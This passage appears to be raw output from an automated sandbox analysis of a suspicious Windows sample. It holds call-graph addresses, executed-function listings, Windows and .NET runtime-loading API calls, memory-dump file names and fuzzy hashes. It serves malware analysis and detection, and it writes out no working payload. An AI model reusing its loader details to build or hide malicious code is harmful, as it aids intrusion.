6cf3a33f 58714->58718 58764 6cf3e904 HeapCreate 58715->58764 58719 6cf3a3f8 58717->58719 58720 6cf3a39f 58717->58720 58724 6cf3a35d 58718->58724 58731 6cf3a2c8 _raise 58718->58731 58774 6cf3d4e7 66 API calls _doexit 58718->58774 58719->58731 58785 6cf3ec2f 79 API calls __freefls@4 58719->58785 58779 6cf3e948 TlsGetValue 58720->58779 58721 6cf3a2c4 58723 6cf3a2cf 58721->58723 58721->58731 58765 6cf3ec9d 86 API calls 4 library calls 58723->58765 58729 6cf3a371 58724->58729 58775 6cf3dd67 67 API calls __setenvp 58724->58775 58778 6cf3a384 70 API calls __mtterm 58729->58778 58731->58705 58733 6cf3a2d4 __RTC_Initialize 58736 6cf3a2d8 58733->58736 58743 6cf3a2e4 GetCommandLineA 58733->58743 58735 6cf3a3b0 58735->58731 58738 6cf3a3bc DecodePointer 58735->58738 58766 6cf3e922 HeapDestroy 58736->58766 58737 6cf3a367 58776 6cf3e97c 70 API calls __setenvp 58737->58776 58744 6cf3a3d1 58738->58744 58741 6cf3a2dd 58741->58731 58742 6cf3a36c 58777 6cf3e922 HeapDestroy 58742->58777 58767 6cf3fc46 71 API calls 2 library calls 58743->58767 58748 6cf3a3d5 58744->58748 58749 6cf3a3ec 58744->58749 58747 6cf3a2f4 58768 6cf3db22 73 API calls __calloc_crt 58747->58768 58783 6cf3e9b9 66 API calls 4 library calls 58748->58783 58784 6cf39d2c 66 API calls 2 library calls 58749->58784 58753 6cf3a2fe 58755 6cf3a302 58753->58755 58770 6cf3fb8b 95 API calls 3 library calls 58753->58770 58754 6cf3a3dc GetCurrentThreadId 58754->58731 58769 6cf3e97c 70 API calls __setenvp 58755->58769 58758 6cf3a30e 58759 6cf3a322 58758->58759 58771 6cf3f915 94 API calls 6 library calls 58758->58771 58759->58741 58773 6cf3dd67 67 API calls __setenvp 58759->58773 58762 6cf3a317 58762->58759 58772 6cf3d2fa 77 API calls 4 library calls 58762->58772 58764->58721 58765->58733 58766->58741 58767->58747 58768->58753 58769->58736 58770->58758 58771->58762 58772->58759 58773->58755 58774->58724 58775->58737 58776->58742 58777->58729 58778->58731 58780 6cf3a3a4 58779->58780 58781 6cf3e95d DecodePointer TlsSetValue 58779->58781 58782 6cf3cb28 66 API calls __calloc_crt 58780->58782 58781->58780 58782->58735 58783->58754 58784->58741 58785->58731 59079 6cee6bc0 59080 6cee6bde 59079->59080 59081 6cee6c26 59080->59081 59089 6cf39d21 59080->59089 59083 6cee6bf7 59084 6cee6c1d 59083->59084 59093 6cee5300 59083->59093 59088 6cee6c3c 59090 6cf3e8d5 __EH_prolog3_catch 59089->59090 59091 6cf39bb5 77 API calls 59090->59091 59092 6cf3e8ed _Fac_tidy 59091->59092 59092->59083 59095 6cee5322 59093->59095 59094 6cee5329 59094->59084 59097 6cee6c60 SafeArrayCreateVector SafeArrayAccessData 59094->59097 59095->59094 59101 6cee5840 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 59095->59101 59098 6cee6cad 59097->59098 59099 6cee6c91 _memmove 59097->59099 59098->59088 59100 6cee6c9f SafeArrayUnaccessData 59099->59100 59100->59098 59101->59094 58786 6cf016af 58787 6cf016b4 58786->58787 58788 6cf0170f 58787->58788 58790 6cf39bb5 77 API calls 58787->58790 58789 6cf01769 58788->58789 58792 6cf39bb5 77 API calls 58788->58792 58791 6cf017c3 58789->58791 58794 6cf39bb5 77 API calls 58789->58794 58793 6cf016cd 58790->58793 58797 6cf0181d 58791->58797 58802 6cf39bb5 77 API calls 58791->58802 58795 6cf01727 58792->58795 58796 6cf016e9 58793->58796 58836 6cefea40 58793->58836 58798 6cf01781 58794->58798 58799 6cf01743 58795->58799 58806 6cefea40 78 API calls 58795->58806 58841 6cee8400 58796->58841 58800 6cf01877 58797->58800 58807 6cf39bb5 77 API calls 58797->58807 58804 6cf0179d 58798->58804 58810 6cefea40 78 API calls 58798->58810 58813 6cee8400 77 API calls 58799->58813 58805 6cf018d1 58800->58805 58811 6cf39bb5 77 API calls 58800->58811 58808 6cf017db 58802->58808 58818 6cee8400 77 API calls 58804->58818 58806->58799 58812 6cf01835 58807->58812 58814 6cf017f7 58808->58814 58815 6cefea40 78 API calls 58808->58815 58810->58804 58817 6cf0188f 58811->58817 58819 6cf01851 58812->58819 58824 6cefea40 78 API calls 58812->58824 58820 6cf0175f 58813->58820 58821 6cee8400 77 API calls 58814->58821 58815->58814 58822 6cf018ab 58817->58822 58828 6cefea40 78 API calls 58817->58828 58823 6cf017b9 58818->58823 58826 6cee8400 77 API calls 58819->58826 58850 6cee80b0 67 API calls moneypunct 58820->58850 58827 6cf01813 58821->58827 58832 6cee8400 77 API calls 58822->58832 58851 6cee80b0 67 API calls moneypunct 58823->58851 58824->58819 58830 6cf0186d 58826->58830 58852 6cee80b0 67 API calls moneypunct 58827->58852 58828->58822 58853 6cee80b0 67 API calls moneypunct 58830->58853 58834 6cf018c7 58832->58834 58854 6cee80b0 67 API calls moneypunct 58834->58854 58837 6cf39bb5 77 API calls 58836->58837 58838 6cefea6b 58837->58838 58839 6cefea7e SysAllocString 58838->58839 58840 6cefea99 58838->58840 58839->58840 58840->58796 58842 6cf39bb5 77 API calls 58841->58842 58843 6cee840d 58842->58843 58844 6cee8416 58843->58844 58855 6cf39533 66 API calls std::exception::_Copy_str 58843->58855 58849 6cee80b0 67 API calls moneypunct 58844->58849 58846 6cee844e 58856 6cf3ac75 RaiseException 58846->58856 58848 6cee8463 58849->58788 58850->58789 58851->58791 58852->58797 58853->58800 58854->58805 58855->58846 58856->58848

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 6CEFB6B0 Relevance: 35.2, APIs: 23, Instructions: 669COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 720 6cefb6b0-6cefb758 VariantInit * 2 721 6cefb75a-6cefb75f call 6cf4c1e0 720->721 722 6cefb764-6cefb769 720->722 721->722 724 6cefb76b-6cefb770 722->724 725 6cefb773-6cefb784 722->725 724->725 727 6cefb78a-6cefb791 725->727 728 6cefbe96-6cefbeb4 VariantClear * 2 725->728 729 6cefb7b9-6cefb7e2 SafeArrayCreateVector 727->729 730 6cefb793-6cefb798 727->730 731 6cefbebe-6cefbeca 728->731 732 6cefbeb6-6cefbebb 728->732 737 6cefb7ec-6cefb809 SafeArrayPutElement VariantClear 729->737 738 6cefb7e4-6cefb7e7 729->738 735 6cefb79a-6cefb79f 730->735 736 6cefb7a2-6cefb7b3 730->736 733 6cefbecc-6cefbed1 731->733 734 6cefbed4-6cefbef2 call 6cf3948b 731->734 732->731 733->734 735->736 736->728 736->729 740 6cefb80f-6cefb81d 737->740 741 6cefbe85-6cefbe8d 737->741 738->737 744 6cefb81f-6cefb824 call 6cf4c1e0 740->744 745 6cefb829-6cefb841 740->745 741->728 746 6cefbe8f-6cefbe90 SafeArrayDestroy 741->746 744->745 745->741 749 6cefb847-6cefb853 745->749 746->728 749->741 750 6cefb859-6cefb85e 749->750 750->741 751 6cefb864-6cefb86b 750->751 752 6cefb913-6cefb917 751->752 753 6cefb871-6cefb87e 751->753 754 6cefb919-6cefb91b 752->754 755 6cefb921-6cefb941 call 6ceedcd0 752->755 756 6cefb888-6cefb8f8 call 6cefdbc0 call 6cef5790 call 6cefc850 753->756 757 6cefb880-6cefb882 753->757 754->741 754->755 755->741 762 6cefb947-6cefb964 call 6ceedcd0 755->762 772 6cefb8fa-6cefb8ff call 6cefe800 756->772 773 6cefb904-6cefb90e call 6cefe800 756->773 757->741 757->756 762->741 768 6cefb96a-6cefb96d 762->768 770 6cefb96f-6cefb98d call 6ceedcd0 768->770 771 6cefb993-6cefb9bf 768->771 770->741 770->771 774 6cefb9cb-6cefba1d VariantClear 771->774 775 6cefb9c1-6cefb9c6 call 6cf4c1e0 771->775 783 6cefbe83 772->783 773->771 774->741 785 6cefba23-6cefba31 774->785 775->774 783->741 786 6cefba3d-6cefba8b 785->786 787 6cefba33-6cefba38 call 6cf4c1e0 785->787 786->741 790 6cefba91-6cefba95 786->790 787->786 790->741 791 6cefba9b-6cefbaa7 call 6cf39bb5 790->791 794 6cefbaa9-6cefbab4 791->794 795 6cefbab6 791->795 796 6cefbab8-6cefbacc call 6cefbf00 794->796 795->796 796->741 799 6cefbad2-6cefbada 796->799 800 6cefbadc-6cefbaed call 6cef47d0 799->800 801 6cefbaf3-6cefbaf8 799->801 800->741 800->801 803 6cefbafa-6cefbb0b call 6cef47d0 801->803 804 6cefbb11-6cefbb2e call 6cef49b0 801->804 803->741 803->804 804->741 810 6cefbb34-6cefbb4b call 6cefcd20 804->810 810->741 813 6cefbb51-6cefbb8e call 6cef5790 call 6cef4170 810->813 818 6cefbb9a-6cefbba8 call 6cefe800 813->818 819 6cefbb90-6cefbb95 call 6cefe800 813->819 824 6cefbbae-6cefbbc0 818->824 825 6cefbca2 818->825 819->783 824->825 827 6cefbbc6-6cefbc5b call 6ceec4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6cefdb10 824->827 826 6cefbca8-6cefbcae 825->826 828 6cefbd78-6cefbdc8 826->828 829 6cefbcb4-6cefbcc6 826->829 839 6cefbc60-6cefbc75 827->839 828->783 840 6cefbdce-6cefbdd7 828->840 829->828 832 6cefbccc-6cefbd76 call 6ceec4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6cefdb10 VariantClear * 2 829->832 832->828 842 6cefbc77-6cefbc8d 839->842 843 6cefbc90-6cefbca0 VariantClear * 2 839->843 840->783 844 6cefbddd-6cefbde4 840->844 842->843 843->826 844->783 847 6cefbdea-6cefbe03 call 6cf39bb5 844->847 850 6cefbe05-6cefbe10 call 6ceec4a0 847->850 851 6cefbe12 847->851 853 6cefbe14-6cefbe3c 850->853 851->853 854 6cefbe7f 853->854 855 6cefbe3e-6cefbe50 853->855 854->783 855->854 857 6cefbe52-6cefbe65 call 6cf39bb5 855->857 860 6cefbe67-6cefbe6f call 6ceec4a0 857->860 861 6cefbe71 857->861 863 6cefbe73-6cefbe7c 860->863 861->863 863->854
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFB73F
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFB748
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEFB7BE
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEFB7F5
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFB801
                                                                                                                                                                                                                                                • Part of subcall function 6CEFC850: VariantInit.OLEAUT32(?), ref: 6CEFC88F
                                                                                                                                                                                                                                                • Part of subcall function 6CEFC850: VariantInit.OLEAUT32(?), ref: 6CEFC895
                                                                                                                                                                                                                                                • Part of subcall function 6CEFC850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEFC8A0
                                                                                                                                                                                                                                                • Part of subcall function 6CEFC850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEFC8D5
                                                                                                                                                                                                                                                • Part of subcall function 6CEFC850: VariantClear.OLEAUT32(?), ref: 6CEFC8E1
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFBA15
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFBE90
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFBEA3
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFBEA9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2012514194-0
                                                                                                                                                                                                                                              • Opcode ID: 4bf977c17a5227163d6cff66183384364ba505fae692524b8f5b075efff934fa
                                                                                                                                                                                                                                              • Instruction ID: 9c726ba6e4c988bfebdb9c47a6534d0f8f1e3962f4b30cdeea3e595eacc4f387
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bf977c17a5227163d6cff66183384364ba505fae692524b8f5b075efff934fa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C525C75D00218DFDB10DFA8C880BEEBBB5BF89304F258199E519AB751DB30A946CF90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 05B00EB3 Relevance: 29.6, Strings: 23, Instructions: 800COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 865 5b00eb3-5b00ece 867 5b00ed4-5b00ee6 865->867 868 5b019bb-5b019bf 865->868 874 5b00f15-5b00f36 867->874 875 5b00ee8-5b00f0a 867->875 869 5b019c1-5b019cd 868->869 870 5b019d2-5b01a58 868->870 871 5b01ee8-5b01ef5 869->871 887 5b01a82 870->887 888 5b01a5a-5b01a66 870->888 879 5b00f3c-5b00f52 874->879 875->874 875->879 880 5b00f54-5b00f58 879->880 881 5b00f5e-5b01042 879->881 880->868 880->881 904 5b01044-5b01050 881->904 905 5b0106c 881->905 891 5b01a88-5b01acd 887->891 889 5b01a70-5b01a76 888->889 890 5b01a68-5b01a6e 888->890 893 5b01a80 889->893 890->893 1022 5b01ad0 call 532b9a1 891->1022 1023 5b01ad0 call 532b9a8 891->1023 893->891 896 5b01ad2-5b01adf 898 5b01ae1 896->898 899 5b01ae5-5b01b0e 896->899 898->899 902 5b01c40-5b01c47 899->902 903 5b01b14-5b01b40 899->903 907 5b01c4d-5b01d4c 902->907 908 5b01d4f-5b01db0 902->908 913 5b01b42 903->913 914 5b01b47-5b01b82 903->914 909 5b01052-5b01058 904->909 910 5b0105a-5b01060 904->910 906 5b01072-5b01124 905->906 929 5b01126-5b01132 906->929 930 5b0114e 906->930 907->908 908->871 911 5b0106a 909->911 910->911 911->906 913->914 914->902 933 5b01134-5b0113a 929->933 934 5b0113c-5b01142 929->934 932 5b01154-5b0116f 930->932 938 5b01171-5b0117d 932->938 939 5b01199 932->939 935 5b0114c 933->935 934->935 935->932 940 5b01187-5b0118d 938->940 941 5b0117f-5b01185 938->941 943 5b0119f-5b011bd 939->943 944 5b01197 940->944 941->944 947 5b011c3-5b012c3 943->947 948 5b012db-5b013bf 943->948 944->943 947->948 962 5b013c1-5b013cd 948->962 963 5b013e9 948->963 964 5b013d7-5b013dd 962->964 965 5b013cf-5b013d5 962->965 967 5b013ef-5b01444 963->967 968 5b013e7 964->968 965->968 975 5b01562-5b01638 967->975 976 5b0144a-5b01549 967->976 968->967 975->868 985 5b0163e-5b01647 975->985 976->975 987 5b01652-5b01751 985->987 988 5b01649-5b0164c 985->988 989 5b0176a-5b01781 987->989 988->987 988->989 989->868 993 5b01787-5b01898 989->993 1011 5b018a3-5b019a2 993->1011 1012 5b0189a-5b0189d 993->1012 1011->868 1012->868 1012->1011 1022->896 1023->896
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1709698902.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b00000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<^q$p<^q$p<^q$p<^q$Gvq$Gvq$Gvq$Gvq$Gvq
                                                                                                                                                                                                                                              • API String ID: 0-3728642687
                                                                                                                                                                                                                                              • Opcode ID: 3571fa672ee8f8c35191969bac89917a80e050bb5633a69f7ee92838c88845e6
                                                                                                                                                                                                                                              • Instruction ID: ab797779ce0ad9a68ffbf2ec61afb890ad9e377caf9fa54394312b4036e35838
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3571fa672ee8f8c35191969bac89917a80e050bb5633a69f7ee92838c88845e6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC829374E402298FDB64DF68C998BD9BBB1BB48310F1481E9D50DAB365DB30AE85CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEB6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1445 6ceeb6c0-6ceeb715 GetModuleHandleW 1446 6ceeb72a-6ceeb738 GetProcAddress 1445->1446 1447 6ceeb717-6ceeb724 LoadLibraryW 1445->1447 1448 6ceeb94c-6ceeb954 1446->1448 1449 6ceeb73e-6ceeb750 1446->1449 1447->1446 1447->1448 1450 6ceeb95e-6ceeb96a 1448->1450 1451 6ceeb956-6ceeb95b 1448->1451 1449->1448 1456 6ceeb756-6ceeb771 1449->1456 1452 6ceeb96c-6ceeb971 1450->1452 1453 6ceeb974-6ceeb98f call 6cf3948b 1450->1453 1451->1450 1452->1453 1456->1448 1459 6ceeb777-6ceeb788 1456->1459 1459->1448 1461 6ceeb78e-6ceeb791 1459->1461 1461->1448 1462 6ceeb797-6ceeb7b2 1461->1462 1462->1448 1464 6ceeb7b8-6ceeb7c5 1462->1464 1464->1448 1466 6ceeb7cb-6ceeb7d0 1464->1466 1467 6ceeb7da-6ceeb7e7 1466->1467 1468 6ceeb7d2-6ceeb7d7 1466->1468 1469 6ceeb7ec-6ceeb7ee 1467->1469 1468->1467 1469->1448 1470 6ceeb7f4-6ceeb7f9 1469->1470 1471 6ceeb7fb-6ceeb800 call 6cf4c1e0 1470->1471 1472 6ceeb805-6ceeb80a 1470->1472 1471->1472 1473 6ceeb80c-6ceeb811 1472->1473 1474 6ceeb814-6ceeb829 1472->1474 1473->1474 1474->1448 1477 6ceeb82f-6ceeb849 1474->1477 1478 6ceeb850-6ceeb85b 1477->1478 1478->1478 1479 6ceeb85d-6ceeb8a4 call 6cf3a116 GetModuleHandleW 1478->1479 1479->1448 1482 6ceeb8aa-6ceeb8c1 1479->1482 1483 6ceeb8c5-6ceeb8d0 1482->1483 1483->1483 1484 6ceeb8d2-6ceeb8f0 GetProcAddress 1483->1484 1484->1448 1485 6ceeb8f2-6ceeb8ff call 6ced5340 1484->1485 1489 6ceeb900-6ceeb905 1485->1489 1489->1489 1490 6ceeb907-6ceeb90d 1489->1490 1490->1489 1491 6ceeb90f-6ceeb912 1490->1491 1492 6ceeb93a 1491->1492 1493 6ceeb914-6ceeb929 1491->1493 1496 6ceeb93d-6ceeb948 call 6ceead80 1492->1496 1494 6ceeb92b-6ceeb92e 1493->1494 1495 6ceeb931-6ceeb938 1493->1495 1494->1495 1495->1496 1496->1448
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(mscoree.dll,FF0C5935), ref: 6CEEB711
                                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(mscoree.dll), ref: 6CEEB71C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6CEEB730
                                                                                                                                                                                                                                              • __cftoe.LIBCMT ref: 6CEEB870
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(?), ref: 6CEEB88B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6CEEB8D7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressHandleModuleProc$LibraryLoad__cftoe
                                                                                                                                                                                                                                              • String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
                                                                                                                                                                                                                                              • API String ID: 1275574042-506955582
                                                                                                                                                                                                                                              • Opcode ID: b2a3cd7906aed0f88e39296395e462aaf595e7bdd1256ef30d56561f5263ba75
                                                                                                                                                                                                                                              • Instruction ID: 61b529572eb64a7066ca0dd864b5b1404f2b864373ee04cd9bd4a586d1efb5e0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2a3cd7906aed0f88e39296395e462aaf595e7bdd1256ef30d56561f5263ba75
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC915771D042899FCB04DFE8C8809AEBBB5FF49314F20866DE119EB750D731A906CB99
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D5C2D8 Relevance: 7.1, Strings: 5, Instructions: 830COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                                                                                                                                                                              • API String ID: 0-3486158592
                                                                                                                                                                                                                                              • Opcode ID: e5ab9033508266756fbd770f445536196912b7e0ce35ebfff3dfe46417fedc9e
                                                                                                                                                                                                                                              • Instruction ID: 60a98dcd500173aaf6651e1eaf78a85659a0a67298c65111fe28dbd836ca9557
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5ab9033508266756fbd770f445536196912b7e0ce35ebfff3dfe46417fedc9e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1628E35A102259FCF04DF69C884AAEBBB2FF88354B15816AEC15DB364DB71EC41CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 05323AD2 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 8cq
                                                                                                                                                                                                                                              • API String ID: 0-304758316
                                                                                                                                                                                                                                              • Opcode ID: b6fe5506f0acbb7ebcfec431d8cb270abfdd8362c4f2a36ff092af3054ab3268
                                                                                                                                                                                                                                              • Instruction ID: b1131bd4da22996bc4259c2ec85c312c65511c175779333dd6b4eb1886ba7327
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6fe5506f0acbb7ebcfec431d8cb270abfdd8362c4f2a36ff092af3054ab3268
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5831D275D41208AFDB04CFA8D480AEEFBF6FF49310F10906AE915B7260DB71AA05CB95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 05323AD8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 8cq
                                                                                                                                                                                                                                              • API String ID: 0-304758316
                                                                                                                                                                                                                                              • Opcode ID: f5bd6a94c77a19e9c3c854167f43597004d8284bf8f3fc31109e4bf0b7302413
                                                                                                                                                                                                                                              • Instruction ID: 6017b46ab34b8b6667868d54174cb2b902becf1b188babeb4c150bf7b2202794
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5bd6a94c77a19e9c3c854167f43597004d8284bf8f3fc31109e4bf0b7302413
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E231E275D41208AFDB04CFA8D480AEEFBF6FF49310F10906AE911B7260DB71AA05CB95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 05B026F8 Relevance: .5, Instructions: 481COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1709698902.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b00000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: af64205daaf5de117f36637db34ab9e10f413d854622f2aefb51bc0c100599a8
                                                                                                                                                                                                                                              • Instruction ID: a1dda0e658004afb78c2763ac16f648c65ff7b32033e3c45f98bce99a955eb2b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af64205daaf5de117f36637db34ab9e10f413d854622f2aefb51bc0c100599a8
